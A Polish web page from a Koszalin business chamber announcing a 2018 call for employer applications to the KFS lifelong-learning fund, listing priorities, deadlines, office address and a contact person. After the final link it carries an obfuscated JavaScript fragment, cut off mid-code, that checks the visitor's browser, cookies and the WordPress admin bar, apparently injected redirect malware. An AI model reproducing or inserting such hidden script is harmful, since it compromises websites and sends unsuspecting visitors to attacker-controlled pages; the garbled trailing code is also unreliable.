NABÓR WNIOSKÓW KFS w terminie 26.10.2018 r. – 09.11.2018 r. | Północna Izba Gospodarcza w Koszalinie

Powiatowy Urząd Pracy w Koszalinie ogłasza nabór wniosków ze środków rezerwy KFS na sfinansowanie działań obejmujących kształcenie ustawiczne pracowników i pracodawcy.

Pracodawca aby skorzystać ze środków rezerwy KFS musi spełnić wymagania priorytetów wydatkowania rezerwy określonych przez Radę Rynku Pracy.

PRIORYTETY

a)wsparcie zawodowego kształcenia ustawicznego w zidentyfikowanych w danym powiecie lub województwie zawodach deficytowych- Lista zawodów

b)wsparcie kształcenia ustawicznego osób po 45 roku życia

Wnioski przyjmowane będą w terminie 26.10.2018 r. – 09.11.2018 r.

w Powiatowym Urzędzie Pracy w Koszalinie

ul. Racławicka 13, pokój 313 III piętro – sekretariat

Szczegółowych informacji na temat naboru udziela pani Iwona Berlicka tel. 94 3455755

http://koszalin.praca.gov.pl/dla-pracodawcow-i-przedsiebiorcow/podnoszenie-kompetencji-i-kwalifikacji-pracownikow-i-kandydatow

http://koszalin.praca.gov.pl/-/7305495-nabor-wnioskow-kfs-w-terminie-26-10-2018-r-09-11-2018-r- 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m